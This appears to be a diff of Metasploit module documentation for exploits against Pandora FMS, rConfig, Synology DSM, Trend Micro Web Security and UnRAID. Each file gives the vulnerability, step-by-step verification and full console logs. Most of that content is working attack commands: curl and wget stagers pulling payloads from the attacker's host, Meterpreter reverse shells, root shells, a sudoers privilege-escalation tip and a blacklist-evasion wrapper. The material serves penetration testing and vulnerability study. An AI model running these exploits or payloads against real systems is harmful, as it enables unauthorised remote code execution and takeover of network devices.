[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
|
||||
[*] Logging in with admin:admin
|
||||
[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
|
||||
[*] Using URL: http://0.0.0.0:8080/t6NXrxF
|
||||
[*] Local IP: http://192.168.1.3:8080/t6NXrxF
|
||||
[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
|
||||
[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
|
||||
[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
|
||||
[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
|
||||
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
|
||||
[*] Command Stager progress - 50.00% done (54/108 bytes)
|
||||
[*] Executing command: chmod +x /tmp/hgzeytII
|
||||
[+] Successfully executed command: chmod +x /tmp/hgzeytII
|
||||
[*] Command Stager progress - 70.37% done (76/108 bytes)
|
||||
[*] Executing command: /tmp/hgzeytII
|
||||
[+] Successfully executed command: /tmp/hgzeytII
|
||||
[*] Command Stager progress - 82.41% done (89/108 bytes)
|
||||
[*] Executing command: rm -f /tmp/hgzeytII
|
||||
[+] Successfully executed command: rm -f /tmp/hgzeytII
|
||||
[*] Command Stager progress - 100.00% done (108/108 bytes)
|
||||
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,77 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Pandora FMS (for Pandora Flexible Monitoring System) is software for
|
||||
monitoring computer networks. Pandora FMS allows monitoring in a visual
|
||||
way the status and performance of several parameters from different
|
||||
operating systems, servers, applications and hardware systems such
|
||||
as firewalls, proxies, databases, web servers or routers.
|
||||
|
||||
This module exploits a vulnerability found in Pandora FMS 7.0 NG and lower.
|
||||
The vulnerability exists on the `net_tools.php` component, due to the insecure
|
||||
usage of the `system()` PHP function.
|
||||
|
||||
This module has been tested with [Pandora FMS 7.0 NG](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/Final/Pandora_FMS_7.0_NG_VmWare_ovf.zip/download)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Launch metasploit and set the appropriate options:
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/linux/http/pandora_ping_cmd_exec`
|
||||
3. `set RHOSTS <rhosts>`
|
||||
4. `set LHOST <lhost>`
|
||||
5. `set USERNAME <username>`
|
||||
6. `set PASSWORD <password>`
|
||||
7. `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
**USERNAME**
|
||||
|
||||
The username for Pandora FMS.
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
The password for Pandora FMS.
|
||||
|
||||
|
||||
## Setup
|
||||
|
||||
https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing
|
||||
|
||||
## Scenarios
|
||||
|
||||
Tested Pandora FMS 7.0 NG on CentOS 7.3.1611
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/pandora_ping_cmd_exec
|
||||
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128
|
||||
RHOSTS => 192.168.215.128
|
||||
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12
|
||||
RHOSTS => 192.168.1.12
|
||||
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5
|
||||
LHOST => 192.168.1.5
|
||||
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin
|
||||
USERNAME => admin
|
||||
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora
|
||||
PASSWORD => pandora
|
||||
msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.5:4444
|
||||
[*] Exploiting...
|
||||
[*] Using URL: http://0.0.0.0:8080/ksdtisFA
|
||||
[*] Local IP: http://192.168.1.5:8080/ksdtisFA
|
||||
[*] Attempting to authenticate using (admin:pandora)
|
||||
[+] Successfully authenticated
|
||||
[*] Attempting to retrieve session cookie
|
||||
[+] Successfully retrieved session cookie: PHPSESSID=knoo75fs75l00ec74atu8ic3d0; clippy=deleted; clippy=deleted;
|
||||
[*] Client 192.168.1.12 (Wget/1.14 (linux-gnu)) requested /ksdtisFA
|
||||
[*] Sending payload to 192.168.1.12 (Wget/1.14 (linux-gnu))
|
||||
[*] Sending stage (989416 bytes) to 192.168.1.12
|
||||
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.12:54784) at 2020-03-09 15:38:25 +0300
|
||||
|
||||
[*] Command Stager progress - 131.25% done (147/112 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,77 @@
|
||||
## Vulnerable Application
|
||||
This module exploits multiple vulnerabilities in rConfig version 3.9 and prior in order to execute arbitrary commands.
|
||||
|
||||
The module first add a temporary admin user to the application by exploiting an SQL injection (CVE-2020-10220).
|
||||
|
||||
Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `path` parameter of the ajaxArchiveFiles functionality within the rConfig web interface (CVE-2019-19509).
|
||||
|
||||
The module works with HTTP or HTTPS (both were tested) but the application does redirection via php code so SSL is enabled by default (and should be used). Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on rConfig 3.9.2 and 3.9.4.
|
||||
|
||||
Tips : once you get a shell, look at the CVE-2019-19585. You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)
|
||||
|
||||
## Verification Steps
|
||||
1. Install the module as usual
|
||||
2. Start msfconsole
|
||||
3. `use exploit/linux/http/rconfig_ajaxarchivefiles_rce`
|
||||
4. `set RHOSTS target_ip`
|
||||
5. `set RPORT target_port`
|
||||
6. `set LHOST your_ip`
|
||||
7. `set LPORT your_port`
|
||||
8. `set verbose true`
|
||||
9. `exploit -j`
|
||||
|
||||
## Scenarios
|
||||
```
|
||||
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/rconfig_ajaxarchivefiles_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes Base path to Rconfig
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (generic/shell_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Auto
|
||||
|
||||
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1
|
||||
RHOSTS => 1.1.1.1
|
||||
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2
|
||||
LHOST => 1.1.1.2
|
||||
|
||||
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) >
|
||||
[+] rConfig version 3.9 detected
|
||||
[+] New temporary user 6QpO8mLt created
|
||||
[+] Authenticated as user 6QpO8mLt
|
||||
[*] Command shell session 1 opened (1.1.1.2:4444 -> 1.1.1.1:34586) at 2020-03-10 22:26:46 +0100
|
||||
[+] Command sucessfully executed
|
||||
[*] User 6QpO8mLt removed successfully !
|
||||
|
||||
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
```
|
||||
## References
|
||||
1. <https://cvedetails.com/cve/CVE-2019-19509/>
|
||||
2. <https://cvedetails.com/cve/CVE-2020-10220/>
|
||||
3. <https://www.exploit-db.com/exploits/47982>
|
||||
4. <https://www.exploit-db.com/exploits/48208>
|
||||
5. <https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py>
|
||||
6. <https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py>
|
||||
@@ -0,0 +1,203 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
|
||||
versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
|
||||
privileges after website authentication.
|
||||
|
||||
The vulnerability is located in `webman/modules/StorageManager/smart.cgi`, which
|
||||
allows appending of a command to the device to be scanned. However, the command
|
||||
with drive is limited to 30 characters. A somewhat valid drive name is required,
|
||||
thus /dev/sd is used, even though it doesn't exist. To circumvent the character
|
||||
restriction, a wget input file is staged in /a, and executed to download our payload
|
||||
to /b. From there the payload is executed. A wfsdelay is required to give time
|
||||
for the payload to download, and the execution of it to run.
|
||||
|
||||
A more detailed explination of exploitation steps:
|
||||
|
||||
1. We first clean the env by deleting `/a`, and `b`
|
||||
2. we use `echo -n` to append our IP:PORT for our staging server to `/a`. This is
|
||||
done in small chunks to stay under the character limit.
|
||||
3. we call `wget -i /a -O b` to write our payload to `b` in `/usr/syno/synoman/webman/modules/StorageManager`
|
||||
4. we wait for HTTP Server to receive the `wget` request and send back the payload. Then we execute it.
|
||||
|
||||
### Notes
|
||||
|
||||
`smart.cgi` and our payload are located in `/usr/syno/synoman/webman/modules/StorageManager`.
|
||||
|
||||
`/var/log/messages` will contain logs of exploitation:
|
||||
|
||||
```
|
||||
May 19 16:35:50 oldNas smart.cgi: smart.cpp:477 smartctl system command failed cmd: /usr/syno/bin/smartctl -d sat -t short /dev/sd`wget -i /a -O b` > /dev/null 2>&1 ret: 4
|
||||
May 19 16:35:50 oldNas smart.cgi: smart.cpp:846 error
|
||||
```
|
||||
|
||||
No randomization was chosen on the `a` and `b` file names since we're so limited on characters as it is.
|
||||
While it would be possible to randomize a single character, it didn't seem worth the effort.
|
||||
|
||||
### Device Downgrade
|
||||
|
||||
The vulnerable DSM can be downloaded from [Synology](https://archive.synology.com/download/DSM/release/5.2/5644/)
|
||||
|
||||
Essentially Synology doesn't want you to downgrade. In order to do so, we need to mount the recovery boot loader
|
||||
and overwrite it with synology 5.2. Then when we cause an issue (by removing the disks on boot), it will boot
|
||||
to the recovery. Since the recovery is 5.2, it will let us install the 'current' version of 5.2.
|
||||
|
||||
You'll want to watch [Downgrade DSM6.x to DSM 5.2](https://youtube.com/watch?v=DFtOmEv63n4)
|
||||
|
||||
The notes from the video are:
|
||||
|
||||
1. Turn on synology and backup data if needed.
|
||||
2. Create a shared folder. ("test" is used in this guide)
|
||||
3. Locally, extract 4 files from DSM 5644.pat (grub_cksum.syno, rd.gz, zImage, checksum.syno)
|
||||
and place the files in the newly created shared folder on the NAS.
|
||||
4. Enable telnet/ssh in the DSM control panel.
|
||||
5. telnet/ssh to the diskstation.
|
||||
6. Log in as admin.
|
||||
7. Type `sudo su`. The password it asks for will also be the admins password.
|
||||
8. Type `cd /dev` to change to the devices directory.
|
||||
9. Type `ls synoboot2` to make sure synoboot2 is listed.
|
||||
10. Type `mkdir /mnt/synoboot` to make a directory to mount to.
|
||||
11. Type `mount synoboot2 /mnt/synoboot` to mount the boot files to the directory we created.
|
||||
12. Type `cd /mnt/synoboot` to change to that directory.
|
||||
13. Type `ls` to view the files in the directory.
|
||||
(note that the names of the 4 files we put in the shared folder, should be there.
|
||||
Although these ones listed are the DSM6 versions)
|
||||
14. Type `cp /volume1/test/checksum.syno /mnt/synoboot`.
|
||||
15. Type `cp /volume1/test/grub_cksum.syno /mnt/synoboot`.
|
||||
16. Type `cp /volume1/test/rd.gz /mnt/synoboot`.
|
||||
17. Type `cp /volume1/test/zImage /mnt/synoboot`.
|
||||
18. Go back into the DSM interface and shutdown. Once the device is shutdown, remove the disks.
|
||||
(This step is important because if you do not remove the disks,
|
||||
the next powerup will detect an issue and recover the DSM6 boot image)
|
||||
19. Power the device up. Should say no disks inserted.
|
||||
Before clicking the connect again button, put the hard disks back in and wait for the HDD LED's to light up.
|
||||
20. If disks are in, click the connect again button.
|
||||
Next page should come up saying to reinstall DSM.
|
||||
Make sure to choose the 5967 pat file so that the bootimage is overwritten correctly.
|
||||
21. Good to go! Data should remain intact as long as it is in a shared folder,
|
||||
and DSM should be a completely stock 5.2 - 5967.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the 5.2 vulnerable DSM
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/synology_dsm_smart_exec_auth```
|
||||
4. Do: ```set username <username>```
|
||||
5. Do: ```set password <password>```
|
||||
6. Do: ```run```
|
||||
7. You should get a root shell.
|
||||
|
||||
## Options
|
||||
|
||||
### Password
|
||||
|
||||
Password for website login. Default is `password`.
|
||||
|
||||
### Username
|
||||
|
||||
Username for website login. Default is `admin`.
|
||||
|
||||
### wfsdelay
|
||||
|
||||
Wfsdelay needs to be at least a couple seconds to allow for payload download and staging. Default is `10`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### DS412+ with DSM 5.2-5644
|
||||
|
||||
```
|
||||
[*] Processing synology.rc for ERB directives.
|
||||
resource (synology.rc)> use modules/exploits/linux/http/synology_dsm_smart_exec_auth
|
||||
resource (synology.rc)> set payload python/meterpreter/reverse_tcp
|
||||
payload => python/meterpreter/reverse_tcp
|
||||
resource (synology.rc)> set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
resource (synology.rc)> set lport 60111
|
||||
lport => 60111
|
||||
resource (synology.rc)> set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
resource (synology.rc)> set srvhost 1.1.1.1
|
||||
srvhost => 1.1.1.1
|
||||
resource (synology.rc)> set username admin
|
||||
username => admin
|
||||
resource (synology.rc)> set password password
|
||||
password => password
|
||||
resource (synology.rc)> set verbose true
|
||||
verbose => true
|
||||
resource (synology.rc)> rexploit
|
||||
[*] Reloading module...
|
||||
[*] Started reverse TCP handler on 1.1.1.1:60111
|
||||
[*] Trying to detect installed version
|
||||
[*] Model DS412+ with version 5.2-5644 detected
|
||||
[*] Attempting Login
|
||||
[*] Using URL: http://1.1.1.1:8080/
|
||||
[*] Cleaning env
|
||||
[*] Staging wget with: echo -n '1.1'>>/a
|
||||
[*] Staging wget with: echo -n '.1.1:'>>/a
|
||||
[*] Staging wget with: echo -n '8080'>>/a
|
||||
[*] Requesting payload pull
|
||||
[+] HTTP Server request received, sending payload
|
||||
[*] Executing payload
|
||||
[*] Sending stage (53755 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 1 opened (1.1.1.1:60111 -> 2.2.2.2:42353) at 2020-05-19 20:13:33 -0400
|
||||
[*] Server stopped.
|
||||
[!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
|
||||
[!] This exploit may require manual cleanup of '/a' on the target
|
||||
|
||||
meterpreter >
|
||||
[+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
|
||||
[+] Deleted /a
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : oldNas
|
||||
OS : Linux 3.10.35 #5644 SMP Thu Nov 12 17:18:22 CST 2015
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter > cat /etc.defaults/VERSION
|
||||
majorversion="5"
|
||||
minorversion="2"
|
||||
buildphase="hotfix"
|
||||
buildnumber="5644"
|
||||
smallfixnumber="0"
|
||||
builddate="2015/11/12"
|
||||
buildtime="17:17:21"
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### DS410 with DSM 5.2-5644
|
||||
|
||||
This unit's version was not able to be determined automatically. `forceexploit` was set to `true` to enable it to run.
|
||||
|
||||
```
|
||||
msf5 exploit(linux/http/synology_dsm_smart_exec_auth) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.135.168:4567
|
||||
[*] Trying to detect installed version
|
||||
[*] Attempting Login
|
||||
[*] Using URL: http://192.168.135.168:8080/
|
||||
[*] Cleaning env
|
||||
[*] Staging wget with: echo -n '192.168'>>/a
|
||||
[*] Staging wget with: echo -n '.135.16'>>/a
|
||||
[*] Staging wget with: echo -n '8:8080'>>/a
|
||||
[*] Requesting payload pull
|
||||
[+] HTTP Server request received, sending payload
|
||||
[*] Executing payload
|
||||
[*] Sending stage (53755 bytes) to 192.168.132.107
|
||||
[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.132.107:54951) at 2020-05-20 13:53:18 -0500
|
||||
[*] Server stopped.
|
||||
[!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
|
||||
[!] This exploit may require manual cleanup of '/a' on the target
|
||||
|
||||
meterpreter >
|
||||
[+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
|
||||
[+] Deleted /a
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : DiskStation
|
||||
OS : Linux 2.6.32.12 #5644 Thu Nov 12 17:17:40 CST 2015
|
||||
Architecture : ppc
|
||||
Meterpreter : python/linux
|
||||
meterpreter > exit
|
||||
```
|
||||
@@ -0,0 +1,105 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits multiple vulnerabilities together in order to achieve remote code execution in Trend Micro Web Security.
|
||||
Unauthenticated users can execute a terminal command under the context of the root user.
|
||||
|
||||
The specific flaw exists within the `LogSettingHandler` class of administrator interface software. When parsing the `mount_device`
|
||||
parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage
|
||||
this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.
|
||||
|
||||
Another specific flaw exists within the proxy service, which listens on port `8080` by default. Unauthenticated users can exploit this
|
||||
vulnerability to communicate with internal services in the product.
|
||||
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the `file`
|
||||
parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this
|
||||
vulnerability to disclose information in the context of the `IWSS` user.
|
||||
|
||||
Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the `root` user.
|
||||
|
||||
Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
|
||||
### Vulnerable Application Installation Steps
|
||||
|
||||
Trend Micro Web Security is distrubed as an ISO image by Trend Micro.
|
||||
|
||||
The following steps are valid on the CentOS 6 x64 bit operating system.
|
||||
|
||||
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
|
||||
2. Find "InterScan Web Security Virtual Appliance" and click.
|
||||
3. Go to **Service Pack** section.
|
||||
4. At the time of writing this documentation, you must see **IWSVA-6.5-SP2-1548-x86_64.iso** next to Download button.
|
||||
5. Click to the download button and complete installation of ISO.
|
||||
|
||||
[https://files.trendmicro.com/products/iwsva/6.5/IWSVA-6.5-SP2-1548-x86_64.iso](https://files.trendmicro.com/products/iwsva/6.5/IWSVA-6.5-SP2-1548-x86_64.iso)
|
||||
|
||||
**System settings used for installation:**
|
||||
- Virtualbox or VMware can be used.
|
||||
- 8 GB of memory at least.
|
||||
- 60 GB of disk size at least.
|
||||
|
||||
### Why perl wrapper for python stager?
|
||||
|
||||
Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is
|
||||
going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under
|
||||
these circumstances.
|
||||
|
||||
I love meterpreter <3 Using python dropper, which gives a meterpreter session, with command injection vulnerability requires using a double
|
||||
quote or Single-Backslash-Single-Single combination.
|
||||
|
||||
```
|
||||
python -c '#{payload.encoded'
|
||||
"python -c '#{payload.encoded.gsub("'", "'\\\\''")}'"
|
||||
```
|
||||
|
||||
In that specific case, none of these approaches works. The idea is wrapping the python dropper within the perl command that does not
|
||||
contain any special characters.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Run `use exploit/linux/http/trendmicro_websecurity_exec`
|
||||
3. Set `RHOST`
|
||||
4. Set `LHOST`
|
||||
5. Run `check`
|
||||
6. **Verify** that you are seeing `The target is vulnerable.`
|
||||
7. Run `exploit`
|
||||
8. You should get a root shell
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Trend Micro Web Security 6.5-SP2_Build_Linux_1852
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/trendmicro_websecurity_exec
|
||||
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31
|
||||
RHOSTS => 192.168.74.31
|
||||
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.31.224.186
|
||||
LHOST => 172.31.224.186
|
||||
msf5 exploit(linux/http/trendmicro_websecurity_exec) > check
|
||||
|
||||
[*] Trying to extract session ID by exploiting reverse proxy service
|
||||
[+] Extracted number of JSESSIONID : 16
|
||||
[*] Testing JSESSIONID #0 : 132B2651F070E865A646F3ABA681769A
|
||||
[+] Awesome !!! JESSIONID #0 is active.
|
||||
[+] 192.168.74.31:8443 - The target is vulnerable.
|
||||
msf5 exploit(linux/http/trendmicro_websecurity_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.31.224.186:4444
|
||||
[*] Trying to extract session ID by exploiting reverse proxy service
|
||||
[+] Extracted number of JSESSIONID : 16
|
||||
[*] Testing JSESSIONID #0 : 132B2651F070E865A646F3ABA681769A
|
||||
[+] Awesome !!! JESSIONID #0 is active.
|
||||
[*] Exploiting command injection vulnerability
|
||||
[*] Sending stage (53755 bytes) to 172.31.224.1
|
||||
[*] Meterpreter session 1 opened (172.31.224.186:4444 -> 172.31.224.1:53061) at 2020-06-18 20:10:29 +0300
|
||||
|
||||
meterpreter > shell
|
||||
Process 40116 created.
|
||||
Channel 1 created.
|
||||
sh: no job control in this shell
|
||||
sh-4.1# id
|
||||
uid=0(root) gid=0(root) groups=0(root),499(iscan)
|
||||
sh-4.1#
|
||||
```
|
||||
@@ -0,0 +1,46 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
|
||||
performs remote code execution as root by abusing the *extract* function used in the `template.php` file.
|
||||
|
||||
### Testing Environment
|
||||
|
||||
Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
|
||||
according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Setup UnRAID 6.8.0
|
||||
2. Start `msfconsole`
|
||||
3. `use exploit/linux/http/unraid_auth_bypass_exec`
|
||||
4. `set RHOST [UNRAID]`
|
||||
5. `check`
|
||||
6. `run`
|
||||
7. You should get a new *root* session
|
||||
|
||||
## Options
|
||||
|
||||
**TARGETURI** : The URI of the Unraid application
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
|
||||
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
|
||||
RHOSTS => 10.10.0.173
|
||||
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
|
||||
[*] 10.10.0.173:80 - The target appears to be vulnerable.
|
||||
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.10.0.161:4444
|
||||
[*] Sending stage (38288 bytes) to 10.10.0.173
|
||||
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
|
||||
[+] Request timed out, OK if running a non-forking/blocking payload...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root (0)
|
||||
```
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user